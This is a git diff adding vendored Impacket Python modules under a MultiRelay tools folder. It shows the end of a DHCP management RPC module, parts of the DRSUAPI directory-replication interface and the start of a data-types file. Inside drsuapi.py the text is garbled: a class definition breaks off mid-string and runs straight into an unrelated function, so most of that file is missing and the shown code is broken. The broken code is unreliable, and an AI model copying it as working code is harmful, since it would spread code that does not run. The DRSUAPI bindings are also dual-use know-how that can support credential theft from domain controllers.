+ DhcpExcludedIpRanges = 3
+ DhcpIpUsedClusters = 4
+ DhcpIpRangesDhcpOnly = 5
+ DhcpIpRangesDhcpBootp = 6
+ DhcpIpRangesBootpOnly = 7
+
+class DHCP_SUBNET_ELEMENT_UNION_V5(NDRUNION):
+ union = {
+ DHCP_SUBNET_ELEMENT_TYPE.DhcpIpRanges : ('IpRange', DHCP_BOOTP_IP_RANGE),
+ DHCP_SUBNET_ELEMENT_TYPE.DhcpSecondaryHosts : ('SecondaryHost', DHCP_HOST_INFO),
+ DHCP_SUBNET_ELEMENT_TYPE.DhcpReservedIps : ('ReservedIp', DHCP_IP_RESERVATION_V4),
+ DHCP_SUBNET_ELEMENT_TYPE.DhcpExcludedIpRanges : ('ExcludeIpRange', DHCP_IP_RANGE),
+ DHCP_SUBNET_ELEMENT_TYPE.DhcpIpUsedClusters : ('IpUsedCluster', DHCP_IP_CLUSTER),
+ }
+
+class DHCP_SUBNET_ELEMENT_DATA_V5(NDRSTRUCT):
+ structure = (
+ ('ElementType', DHCP_SUBNET_ELEMENT_TYPE),
+ ('Element', DHCP_SUBNET_ELEMENT_UNION_V5),
+ )
+
+class LPDHCP_SUBNET_ELEMENT_DATA_V5(NDRUniConformantArray):
+ item = DHCP_SUBNET_ELEMENT_DATA_V5
+
+class DHCP_SUBNET_ELEMENT_INFO_ARRAY_V5(NDRSTRUCT):
+ structure = (
+ ('NumElements', DWORD),
+ ('Elements', LPDHCP_SUBNET_ELEMENT_DATA_V5),
+ )
+
+class LPDHCP_SUBNET_ELEMENT_INFO_ARRAY_V5(NDRPOINTER):
+ referent = (
+ ('Data', DHCP_SUBNET_ELEMENT_INFO_ARRAY_V5)
+ )
+
+class DHCP_OPTION_DATA_TYPE(NDRENUM):
+ class enumItems(Enum):
+ DhcpByteOption = 0
+ DhcpWordOption = 1
+ DhcpDWordOption = 2
+ DhcpDWordDWordOption = 3
+ DhcpIpAddressOption = 4
+ DhcpStringDataOption = 5
+ DhcpBinaryDataOption = 6
+ DhcpEncapsulatedDataOption = 7
+ DhcpIpv6AddressOption = 8
+
+class DHCP_OPTION_ELEMENT_UNION(NDRUNION):
+ commonHdr = (
+ ('tag', DHCP_OPTION_DATA_TYPE),
+ )
+ union = {
+ DHCP_OPTION_DATA_TYPE.DhcpByteOption : ('ByteOption', BYTE),
+ DHCP_OPTION_DATA_TYPE.DhcpWordOption : ('WordOption', WORD),
+ DHCP_OPTION_DATA_TYPE.DhcpDWordOption : ('DWordOption', DWORD),
+ DHCP_OPTION_DATA_TYPE.DhcpDWordDWordOption : ('DWordDWordOption', DWORD_DWORD),
+ DHCP_OPTION_DATA_TYPE.DhcpIpAddressOption : ('IpAddressOption', DHCP_IP_ADDRESS),
+ DHCP_OPTION_DATA_TYPE.DhcpStringDataOption : ('StringDataOption', LPWSTR),
+ DHCP_OPTION_DATA_TYPE.DhcpBinaryDataOption : ('BinaryDataOption', DHCP_BINARY_DATA),
+ DHCP_OPTION_DATA_TYPE.DhcpEncapsulatedDataOption: ('EncapsulatedDataOption', DHCP_BINARY_DATA),
+ DHCP_OPTION_DATA_TYPE.DhcpIpv6AddressOption : ('Ipv6AddressDataOption', LPWSTR),
+ }
+
+class DHCP_OPTION_DATA_ELEMENT(NDRSTRUCT):
+ structure = (
+ ('OptionType', DHCP_OPTION_DATA_TYPE),
+ ('Element', DHCP_OPTION_ELEMENT_UNION),
+ )
+
+class DHCP_OPTION_DATA_ELEMENT_ARRAY2(NDRUniConformantArray):
+ item = DHCP_OPTION_DATA_ELEMENT
+
+class LPDHCP_OPTION_DATA_ELEMENT(NDRPOINTER):
+ referent = (
+ ('Data', DHCP_OPTION_DATA_ELEMENT_ARRAY2),
+ )
+
+class DHCP_OPTION_DATA(NDRSTRUCT):
+ structure = (
+ ('NumElements', DWORD),
+ ('Elements', LPDHCP_OPTION_DATA_ELEMENT),
+ )
+
+class DHCP_OPTION_VALUE(NDRSTRUCT):
+ structure = (
+ ('OptionID', DHCP_OPTION_ID),
+ ('Value', DHCP_OPTION_DATA),
+ )
+
+class PDHCP_OPTION_VALUE(NDRPOINTER):
+ referent = (
+ ('Data', DHCP_OPTION_VALUE),
+ )
+
+class DHCP_OPTION_VALUE_ARRAY2(NDRUniConformantArray):
+ item = DHCP_OPTION_VALUE
+
+class LPDHCP_OPTION_VALUE(NDRPOINTER):
+ referent = (
+ ('Data', DHCP_OPTION_VALUE_ARRAY2),
+ )
+
+class DHCP_OPTION_VALUE_ARRAY(NDRSTRUCT):
+ structure = (
+ ('NumElements', DWORD),
+ ('Values', LPDHCP_OPTION_VALUE),
+ )
+
+class LPDHCP_OPTION_VALUE_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', DHCP_OPTION_VALUE_ARRAY),
+ )
+
+class DHCP_ALL_OPTION_VALUES(NDRSTRUCT):
+ structure = (
+ ('ClassName', LPWSTR),
+ ('VendorName', LPWSTR),
+ ('IsVendor', BOOL),
+ ('OptionsArray', LPDHCP_OPTION_VALUE_ARRAY),
+ )
+
+class OPTION_VALUES_ARRAY(NDRUniConformantArray):
+ item = DHCP_ALL_OPTION_VALUES
+
+class LPOPTION_VALUES_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', OPTION_VALUES_ARRAY),
+ )
+
+class DHCP_ALL_OPTIONS_VALUES(NDRSTRUCT):
+ structure = (
+ ('Flags', DWORD),
+ ('NumElements', DWORD),
+ ('Options', LPOPTION_VALUES_ARRAY),
+ )
+
+class LPDHCP_ALL_OPTION_VALUES(NDRPOINTER):
+ referent = (
+ ('Data', DHCP_ALL_OPTIONS_VALUES),
+ )
+
+################################################################################
+# RPC CALLS
+################################################################################
+# Interface dhcpsrv
+class DhcpGetSubnetInfo(NDRCALL):
+ opnum = 2
+ structure = (
+ ('ServerIpAddress', DHCP_SRV_HANDLE),
+ ('SubnetAddress', DHCP_IP_ADDRESS),
+ )
+
+class DhcpGetSubnetInfoResponse(NDRCALL):
+ structure = (
+ ('SubnetInfo', LPDHCP_SUBNET_INFO),
+ ('ErrorCode', ULONG),
+ )
+
+class DhcpEnumSubnets(NDRCALL):
+ opnum = 3
+ structure = (
+ ('ServerIpAddress', DHCP_SRV_HANDLE),
+ ('ResumeHandle', LPDWORD),
+ ('PreferredMaximum', DWORD),
+ )
+
+class DhcpEnumSubnetsResponse(NDRCALL):
+ structure = (
+ ('ResumeHandle', LPDWORD),
+ ('EnumInfo', DHCP_IP_ARRAY),
+ ('EnumRead', DWORD),
+ ('EnumTotal', DWORD),
+ ('ErrorCode', ULONG),
+ )
+
+class DhcpGetOptionValue(NDRCALL):
+ opnum = 13
+ structure = (
+ ('ServerIpAddress', DHCP_SRV_HANDLE),
+ ('OptionID', DHCP_OPTION_ID),
+ ('ScopeInfo', DHCP_OPTION_SCOPE_INFO),
+ )
+
+class DhcpGetOptionValueResponse(NDRCALL):
+ structure = (
+ ('OptionValue', PDHCP_OPTION_VALUE),
+ ('ErrorCode', ULONG),
+ )
+
+class DhcpEnumOptionValues(NDRCALL):
+ opnum = 14
+ structure = (
+ ('ServerIpAddress', DHCP_SRV_HANDLE),
+ ('ScopeInfo', DHCP_OPTION_SCOPE_INFO),
+ ('ResumeHandle', LPDWORD),
+ ('PreferredMaximum', DWORD),
+ )
+
+class DhcpEnumOptionValuesResponse(NDRCALL):
+ structure = (
+ ('ResumeHandle', DWORD),
+ ('OptionValues', LPDHCP_OPTION_VALUE_ARRAY),
+ ('OptionsRead', DWORD),
+ ('OptionsTotal', DWORD),
+ ('ErrorCode', ULONG),
+ )
+
+class DhcpGetClientInfoV4(NDRCALL):
+ opnum = 34
+ structure = (
+ ('ServerIpAddress', DHCP_SRV_HANDLE),
+ ('SearchInfo', DHCP_SEARCH_INFO),
+ )
+
+class DhcpGetClientInfoV4Response(NDRCALL):
+ structure = (
+ ('ClientInfo', LPDHCP_CLIENT_INFO_V4),
+ ('ErrorCode', ULONG),
+ )
+
+class DhcpEnumSubnetClientsV4(NDRCALL):
+ opnum = 35
+ structure = (
+ ('ServerIpAddress', DHCP_SRV_HANDLE),
+ ('SubnetAddress', DHCP_IP_ADDRESS),
+ ('ResumeHandle', DWORD),
+ ('PreferredMaximum', DWORD),
+ )
+
+class DhcpEnumSubnetClientsV4Response(NDRCALL):
+ structure = (
+ ('ResumeHandle', LPDWORD),
+ ('ClientInfo', LPDHCP_CLIENT_INFO_ARRAY_V4),
+ ('ClientsRead', DWORD),
+ ('ClientsTotal', DWORD),
+ ('ErrorCode', ULONG),
+ )
+
+# Interface dhcpsrv2
+
+class DhcpEnumSubnetClientsV5(NDRCALL):
+ opnum = 0
+ structure = (
+ ('ServerIpAddress', DHCP_SRV_HANDLE),
+ ('SubnetAddress', DHCP_IP_ADDRESS),
+ ('ResumeHandle', LPDWORD),
+ ('PreferredMaximum', DWORD),
+ )
+
+class DhcpEnumSubnetClientsV5Response(NDRCALL):
+ structure = (
+ ('ResumeHandle', DWORD),
+ ('ClientsInfo', LPDHCP_CLIENT_INFO_ARRAY_V5),
+ ('ClientsRead', DWORD),
+ ('ClientsTotal', DWORD),
+ )
+
+class DhcpGetOptionValueV5(NDRCALL):
+ opnum = 21
+ structure = (
+ ('ServerIpAddress', DHCP_SRV_HANDLE),
+ ('Flags', DWORD),
+ ('OptionID', DHCP_OPTION_ID),
+ ('ClassName', LPWSTR),
+ ('VendorName', LPWSTR),
+ ('ScopeInfo', DHCP_OPTION_SCOPE_INFO),
+ )
+
+class DhcpGetOptionValueV5Response(NDRCALL):
+ structure = (
+ ('OptionValue', PDHCP_OPTION_VALUE),
+ ('ErrorCode', ULONG),
+ )
+
+class DhcpEnumOptionValuesV5(NDRCALL):
+ opnum = 22
+ structure = (
+ ('ServerIpAddress', DHCP_SRV_HANDLE),
+ ('Flags', DWORD),
+ ('ClassName', LPWSTR),
+ ('VendorName', LPWSTR),
+ ('ScopeInfo', DHCP_OPTION_SCOPE_INFO),
+ ('ResumeHandle', LPDWORD),
+ ('PreferredMaximum', DWORD),
+ )
+
+class DhcpEnumOptionValuesV5Response(NDRCALL):
+ structure = (
+ ('ResumeHandle', DWORD),
+ ('OptionValues', LPDHCP_OPTION_VALUE_ARRAY),
+ ('OptionsRead', DWORD),
+ ('OptionsTotal', DWORD),
+ ('ErrorCode', ULONG),
+ )
+
+class DhcpGetAllOptionValues(NDRCALL):
+ opnum = 30
+ structure = (
+ ('ServerIpAddress', DHCP_SRV_HANDLE),
+ ('Flags', DWORD),
+ ('ScopeInfo', DHCP_OPTION_SCOPE_INFO),
+ )
+
+class DhcpGetAllOptionValuesResponse(NDRCALL):
+ structure = (
+ ('Values', LPDHCP_ALL_OPTION_VALUES),
+ ('ErrorCode', ULONG),
+ )
+
+class DhcpEnumSubnetElementsV5(NDRCALL):
+ opnum = 38
+ structure = (
+ ('ServerIpAddress', DHCP_SRV_HANDLE),
+ ('SubnetAddress', DHCP_IP_ADDRESS),
+ ('EnumElementType', DHCP_SUBNET_ELEMENT_TYPE),
+ ('ResumeHandle', LPDWORD),
+ ('PreferredMaximum', DWORD),
+ )
+
+class DhcpEnumSubnetElementsV5Response(NDRCALL):
+ structure = (
+ ('ResumeHandle', DWORD),
+ ('EnumElementInfo', LPDHCP_SUBNET_ELEMENT_INFO_ARRAY_V5),
+ ('ElementsRead', DWORD),
+ ('ElementsTotal', DWORD),
+ ('ErrorCode', ULONG),
+ )
+
+class DhcpEnumSubnetClientsVQ(NDRCALL):
+ opnum = 47
+ structure = (
+ ('ServerIpAddress', DHCP_SRV_HANDLE),
+ ('SubnetAddress', DHCP_IP_ADDRESS),
+ ('ResumeHandle', LPDWORD),
+ ('PreferredMaximum', DWORD),
+ )
+
+class DhcpEnumSubnetClientsVQResponse(NDRCALL):
+ structure = (
+ ('ResumeHandle', LPDWORD),
+ ('ClientInfo', LPDHCP_CLIENT_INFO_ARRAY_VQ),
+ ('ClientsRead', DWORD),
+ ('ClientsTotal', DWORD),
+ ('ErrorCode', ULONG),
+ )
+
+class DhcpV4GetClientInfo(NDRCALL):
+ opnum = 123
+ structure = (
+ ('ServerIpAddress', DHCP_SRV_HANDLE),
+ ('SearchInfo', DHCP_SEARCH_INFO),
+ )
+
+class DhcpV4GetClientInfoResponse(NDRCALL):
+ structure = (
+ ('ClientInfo', LPDHCP_CLIENT_INFO_PB),
+ ('ErrorCode', ULONG),
+ )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0: (DhcpEnumSubnetClientsV5, DhcpEnumSubnetClientsV5Response),
+ 2: (DhcpGetSubnetInfo, DhcpGetSubnetInfoResponse),
+ 3: (DhcpEnumSubnets, DhcpEnumSubnetsResponse),
+ 13: (DhcpGetOptionValue, DhcpGetOptionValueResponse),
+ 14: (DhcpEnumOptionValues, DhcpEnumOptionValuesResponse),
+ 21: (DhcpGetOptionValueV5, DhcpGetOptionValueV5Response),
+ 22: (DhcpEnumOptionValuesV5, DhcpEnumOptionValuesV5Response),
+ 30: (DhcpGetAllOptionValues, DhcpGetAllOptionValuesResponse),
+ 34: (DhcpGetClientInfoV4, DhcpGetClientInfoV4Response),
+ 35: (DhcpEnumSubnetClientsV4, DhcpEnumSubnetClientsV4Response),
+ 38: (DhcpEnumSubnetElementsV5, DhcpEnumSubnetElementsV5Response),
+ 47: (DhcpEnumSubnetClientsVQ, DhcpEnumSubnetClientsVQResponse),
+ 123: (DhcpV4GetClientInfo, DhcpV4GetClientInfoResponse),
+}
+
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hDhcpGetClientInfoV4(dce, searchType, searchValue):
+ request = DhcpGetClientInfoV4()
+
+ request['ServerIpAddress'] = NULL
+ request['SearchInfo']['SearchType'] = searchType
+ request['SearchInfo']['SearchInfo']['tag'] = searchType
+ if searchType == DHCP_SEARCH_INFO_TYPE.DhcpClientIpAddress:
+ request['SearchInfo']['SearchInfo']['ClientIpAddress'] = searchValue
+ elif searchType == DHCP_SEARCH_INFO_TYPE.DhcpClientHardwareAddress:
+ # This should be a DHCP_BINARY_DATA
+ request['SearchInfo']['SearchInfo']['ClientHardwareAddress'] = searchValue
+ else:
+ request['SearchInfo']['SearchInfo']['ClientName'] = searchValue
+
+ return dce.request(request)
+
+def hDhcpGetSubnetInfo(dce, subnetaddress):
+ request = DhcpGetSubnetInfo()
+
+ request['ServerIpAddress'] = NULL
+ request['SubnetAddress'] = subnetaddress
+ resp = dce.request(request)
+
+ return resp
+
+def hDhcpGetOptionValue(dce, optionID, scopetype=DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions, options=NULL):
+ request = DhcpGetOptionValue()
+
+ request['ServerIpAddress'] = NULL
+ request['OptionID'] = optionID
+ request['ScopeInfo']['ScopeType'] = scopetype
+ if scopetype != DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions and scopetype != DHCP_OPTION_SCOPE_TYPE.DhcpGlobalOptions:
+ request['ScopeInfo']['ScopeInfo']['tag'] = scopetype
+ if scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpSubnetOptions:
+ request['ScopeInfo']['ScopeInfo']['SubnetScopeInfo'] = options
+ elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpReservedOptions:
+ request['ScopeInfo']['ScopeInfo']['ReservedScopeInfo'] = options
+ elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpMScopeOptions:
+ request['ScopeInfo']['ScopeInfo']['MScopeInfo'] = options
+
+ status = system_errors.ERROR_MORE_DATA
+ while status == system_errors.ERROR_MORE_DATA:
+ try:
+ resp = dce.request(request)
+ except DCERPCException as e:
+ if str(e).find('ERROR_NO_MORE_ITEMS') < 0:
+ raise
+ resp = e.get_packet()
+ return resp
+
+def hDhcpEnumOptionValues(dce, scopetype=DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions, options=NULL,
+ preferredMaximum=0xffffffff):
+ request = DhcpEnumOptionValues()
+
+ request['ServerIpAddress'] = NULL
+ request['ScopeInfo']['ScopeType'] = scopetype
+ if scopetype != DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions and scopetype != DHCP_OPTION_SCOPE_TYPE.DhcpGlobalOptions:
+ request['ScopeInfo']['ScopeInfo']['tag'] = scopetype
+ if scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpSubnetOptions:
+ request['ScopeInfo']['ScopeInfo']['SubnetScopeInfo'] = options
+ elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpReservedOptions:
+ request['ScopeInfo']['ScopeInfo']['ReservedScopeInfo'] = options
+ elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpMScopeOptions:
+ request['ScopeInfo']['ScopeInfo']['MScopeInfo'] = options
+ request['ResumeHandle'] = NULL
+ request['PreferredMaximum'] = preferredMaximum
+
+ status = system_errors.ERROR_MORE_DATA
+ while status == system_errors.ERROR_MORE_DATA:
+ try:
+ resp = dce.request(request)
+ except DCERPCException as e:
+ if str(e).find('ERROR_NO_MORE_ITEMS') < 0:
+ raise
+ resp = e.get_packet()
+ return resp
+
+def hDhcpEnumOptionValuesV5(dce, flags=DHCP_FLAGS_OPTION_DEFAULT, classname=NULL, vendorname=NULL,
+ scopetype=DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions, options=NULL,
+ preferredMaximum=0xffffffff):
+ request = DhcpEnumOptionValuesV5()
+
+ request['ServerIpAddress'] = NULL
+ request['Flags'] = flags
+ request['ClassName'] = classname
+ request['VendorName'] = vendorname
+ request['ScopeInfo']['ScopeType'] = scopetype
+ request['ScopeInfo']['ScopeInfo']['tag'] = scopetype
+ if scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpSubnetOptions:
+ request['ScopeInfo']['ScopeInfo']['SubnetScopeInfo'] = options
+ elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpReservedOptions:
+ request['ScopeInfo']['ScopeInfo']['ReservedScopeInfo'] = options
+ elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpMScopeOptions:
+ request['ScopeInfo']['ScopeInfo']['MScopeInfo'] = options
+ request['ResumeHandle'] = NULL
+ request['PreferredMaximum'] = preferredMaximum
+
+ status = system_errors.ERROR_MORE_DATA
+ while status == system_errors.ERROR_MORE_DATA:
+ try:
+ resp = dce.request(request)
+ except DCERPCException as e:
+ if str(e).find('ERROR_NO_MORE_ITEMS') < 0:
+ raise
+ resp = e.get_packet()
+ return resp
+
+def hDhcpGetOptionValueV5(dce, option_id, flags=DHCP_FLAGS_OPTION_DEFAULT, classname=NULL, vendorname=NULL,
+ scopetype=DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions, options=NULL):
+ request = DhcpGetOptionValueV5()
+
+ request['ServerIpAddress'] = NULL
+ request['Flags'] = flags
+ request['OptionID'] = option_id
+ request['ClassName'] = classname
+ request['VendorName'] = vendorname
+ request['ScopeInfo']['ScopeType'] = scopetype
+ request['ScopeInfo']['ScopeInfo']['tag'] = scopetype
+ if scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpSubnetOptions:
+ request['ScopeInfo']['ScopeInfo']['SubnetScopeInfo'] = options
+ elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpReservedOptions:
+ request['ScopeInfo']['ScopeInfo']['ReservedScopeInfo'] = options
+ elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpMScopeOptions:
+ request['ScopeInfo']['ScopeInfo']['MScopeInfo'] = options
+
+ status = system_errors.ERROR_MORE_DATA
+ while status == system_errors.ERROR_MORE_DATA:
+ try:
+ resp = dce.request(request)
+ except DCERPCException as e:
+ if str(e).find('ERROR_NO_MORE_ITEMS') < 0:
+ raise
+ resp = e.get_packet()
+ return resp
+
+def hDhcpGetAllOptionValues(dce, scopetype=DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions, options=NULL):
+ request = DhcpGetAllOptionValues()
+
+ request['ServerIpAddress'] = NULL
+ request['Flags'] = NULL
+ request['ScopeInfo']['ScopeType'] = scopetype
+ request['ScopeInfo']['ScopeInfo']['tag'] = scopetype
+ if scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpSubnetOptions:
+ request['ScopeInfo']['ScopeInfo']['SubnetScopeInfo'] = options
+ elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpReservedOptions:
+ request['ScopeInfo']['ScopeInfo']['ReservedScopeInfo'] = options
+ elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpMScopeOptions:
+ request['ScopeInfo']['ScopeInfo']['MScopeInfo'] = options
+
+ status = system_errors.ERROR_MORE_DATA
+ while status == system_errors.ERROR_MORE_DATA:
+ try:
+ resp = dce.request(request)
+ except DCERPCException as e:
+ if str(e).find('ERROR_NO_MORE_ITEMS') < 0:
+ raise
+ resp = e.get_packet()
+ return resp
+
+def hDhcpEnumSubnets(dce, preferredMaximum=0xffffffff):
+ request = DhcpEnumSubnets()
+
+ request['ServerIpAddress'] = NULL
+ request['ResumeHandle'] = NULL
+ request['PreferredMaximum'] = preferredMaximum
+ status = system_errors.ERROR_MORE_DATA
+ while status == system_errors.ERROR_MORE_DATA:
+ try:
+ resp = dce.request(request)
+ except DCERPCException as e:
+ if str(e).find('STATUS_MORE_ENTRIES') < 0:
+ raise
+ resp = e.get_packet()
+ return resp
+
+def hDhcpEnumSubnetClientsVQ(dce, preferredMaximum=0xffffffff):
+ request = DhcpEnumSubnetClientsVQ()
+
+ request['ServerIpAddress'] = NULL
+ request['SubnetAddress'] = NULL
+ request['ResumeHandle'] = NULL
+ request['PreferredMaximum'] = preferredMaximum
+ status = system_errors.ERROR_MORE_DATA
+ while status == system_errors.ERROR_MORE_DATA:
+ try:
+ resp = dce.request(request)
+ except DCERPCException as e:
+ if str(e).find('STATUS_MORE_ENTRIES') < 0:
+ raise
+ resp = e.get_packet()
+ return resp
+
+def hDhcpEnumSubnetClientsV4(dce, preferredMaximum=0xffffffff):
+ request = DhcpEnumSubnetClientsV4()
+
+ request['ServerIpAddress'] = NULL
+ request['SubnetAddress'] = NULL
+ request['ResumeHandle'] = NULL
+ request['PreferredMaximum'] = preferredMaximum
+ status = system_errors.ERROR_MORE_DATA
+ while status == system_errors.ERROR_MORE_DATA:
+ try:
+ resp = dce.request(request)
+ except DCERPCException as e:
+ if str(e).find('STATUS_MORE_ENTRIES') < 0:
+ raise
+ resp = e.get_packet()
+ return resp
+
+def hDhcpEnumSubnetClientsV5(dce, subnetAddress=0, preferredMaximum=0xffffffff):
+ request = DhcpEnumSubnetClientsV5()
+
+ request['ServerIpAddress'] = NULL
+ request['SubnetAddress'] = subnetAddress
+ request['ResumeHandle'] = NULL
+ request['PreferredMaximum'] = preferredMaximum
+ status = system_errors.ERROR_MORE_DATA
+ while status == system_errors.ERROR_MORE_DATA:
+ try:
+ resp = dce.request(request)
+ except DCERPCSessionError as e:
+ if str(e).find('STATUS_MORE_ENTRIES') < 0:
+ raise
+ resp = e.get_packet()
+ return resp
+
+def hDhcpEnumSubnetElementsV5(dce, subnet_address, element_type=DHCP_SUBNET_ELEMENT_TYPE.DhcpIpRanges, preferredMaximum=0xffffffff):
+ request = DhcpEnumSubnetElementsV5()
+
+ request['ServerIpAddress'] = NULL
+ request['SubnetAddress'] = subnet_address
+ request['EnumElementType'] = element_type
+ request['ResumeHandle'] = NULL
+ request['PreferredMaximum'] = preferredMaximum
+
+ status = system_errors.ERROR_MORE_DATA
+ while status == system_errors.ERROR_MORE_DATA:
+ try:
+ resp = dce.request(request)
+ except DCERPCException as e:
+ if str(e).find('ERROR_NO_MORE_ITEMS') < 0:
+ raise
+ resp = e.get_packet()
+ return resp
diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/drsuapi.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/drsuapi.py
new file mode 100644
index 0000000..1671aa4
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/drsuapi.py
@@ -0,0 +1,1517 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+# [MS-DRSR] Directory Replication Service (DRS) DRSUAPI Interface implementation
+#
+# Best way to learn how to use these calls is to grab the protocol standard
+# so you understand what the call does, and then read the test case located
+# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+# Some calls have helper functions, which makes it even easier to use.
+# They are located at the end of this file.
+# Helper functions start with "h".
+# There are test cases for them too.
+#
+from __future__ import division
+from __future__ import print_function
+from builtins import bytes
+import hashlib
+from struct import pack
+import six
+from six import PY2
+
+from impacket import LOG
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray, NDRUNION, NDR, NDRENUM
+from impacket.dcerpc.v5.dtypes import PUUID, DWORD, NULL, GUID, LPWSTR, BOOL, ULONG, UUID, LONGLONG, ULARGE_INTEGER, LARGE_INTEGER
+from impacket import hresult_errors, system_errors
+from impacket.structure import Structure
+from impacket.uuid import uuidtup_to_bin, string_to_bin
+from impacket.dcerpc.v5.enum import Enum
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.krb5 import crypto
+from pyasn1.type import univ
+from pyasn1.codec.ber import decoder
+from impacket.crypto import transformKey
+
+try:
+ from Cryptodome.Cipher import ARC4, DES
+except Exception:
+ LOG.critical("Warning: You don't have any crypto installed. You need pycryptodomex")
+ LOG.critical("See https://pypi.org/project/pycryptodomex/")
+
+MSRPC_UUID_DRSUAPI = uuidtup_to_bin(('E3514235-4B06-11D1-AB04-00C04FC2DCD2','4.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ key = self.error_code
+ if key in hresult_errors.ERROR_MESSAGES:
+ error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+ return 'DRSR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ elif key & 0xffff in system_errors.ERROR_MESSAGES:
+ error_msg_short = system_errors.ERROR_MESSAGES[key & 0xffff][0]
+ error_msg_verbose = system_errors.ERROR_MESSAGES[key & 0xffff][1]
+ return 'DRSR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'DRSR SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 4.1.10.2.17 EXOP_ERR Codes
+class EXOP_ERR(NDRENUM):
+ align = 4
+ align64 = 4
+ structure = (
+ ('Data', '= 16384:
+ # mark it so that it is known to not be the whole lastValue
+ lowerWord += 32768
+
+ upperWord = pos
+
+ attrTyp = ATTRTYP()
+ attrTyp['Data'] = (upperWord << 16) + lowerWord
+ return attrTyp
+
+def OidFromAttid(prefixTable, attr):
+ # separate the ATTRTYP into two parts
+ upperWord = attr // 65536
+ lowerWord = attr % 65536
+
+ # search in the prefix table to find the upperWord, if found,
+ # construct the binary OID by appending lowerWord to the end of
+ # found prefix.
+
+ binaryOID = None
+ for j, item in enumerate(prefixTable):
+ if item['ndx'] == upperWord:
+ binaryOID = item['prefix']['elements'][:item['prefix']['length']]
+ if lowerWord < 128:
+ binaryOID.append(pack('B',lowerWord))
+ else:
+ if lowerWord >= 32768:
+ lowerWord -= 32768
+ binaryOID.append(pack('B',(((lowerWord//128) % 128)+128)))
+ binaryOID.append(pack('B',(lowerWord%128)))
+ break
+
+ if binaryOID is None:
+ return None
+ return str(decoder.decode(b'\x06' + pack('B',(len(binaryOID))) + b''.join(binaryOID), asn1Spec = univ.ObjectIdentifier())[0])
+
+if __name__ == '__main__':
+ prefixTable = []
+ oid0 = '1.2.840.113556.1.4.94'
+ oid1 = '2.5.6.2'
+ oid2 = '1.2.840.113556.1.2.1'
+ oid3 = '1.2.840.113556.1.3.223'
+ oid4 = '1.2.840.113556.1.5.7000.53'
+
+ o0 = MakeAttid(prefixTable, oid0)
+ print(hex(o0))
+ o1 = MakeAttid(prefixTable, oid1)
+ print(hex(o1))
+ o2 = MakeAttid(prefixTable, oid2)
+ print(hex(o2))
+ o3 = MakeAttid(prefixTable, oid3)
+ print(hex(o3))
+ o4 = MakeAttid(prefixTable, oid4)
+ print(hex(o4))
+ jj = OidFromAttid(prefixTable, o0)
+ print(jj)
+ jj = OidFromAttid(prefixTable, o1)
+ print(jj)
+ jj = OidFromAttid(prefixTable, o2)
+ print(jj)
+ jj = OidFromAttid(prefixTable, o3)
+ print(jj)
+ jj = OidFromAttid(prefixTable, o4)
+ print(jj)
diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dtypes.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dtypes.py
new file mode 100644
index 0000000..903a9ae
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dtypes.py
@@ -0,0 +1,542 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+# [MS-DTYP] Interface mini implementation
+#
+from __future__ import division
+from __future__ import print_function
+from struct import pack
+from six import binary_type
+
+from impacket.dcerpc.v5.ndr import NDRULONG, NDRUHYPER, NDRSHORT, NDRLONG, NDRPOINTER, NDRUniConformantArray, \
+ NDRUniFixedArray, NDR, NDRHYPER, NDRSMALL, NDRPOINTERNULL, NDRSTRUCT, \
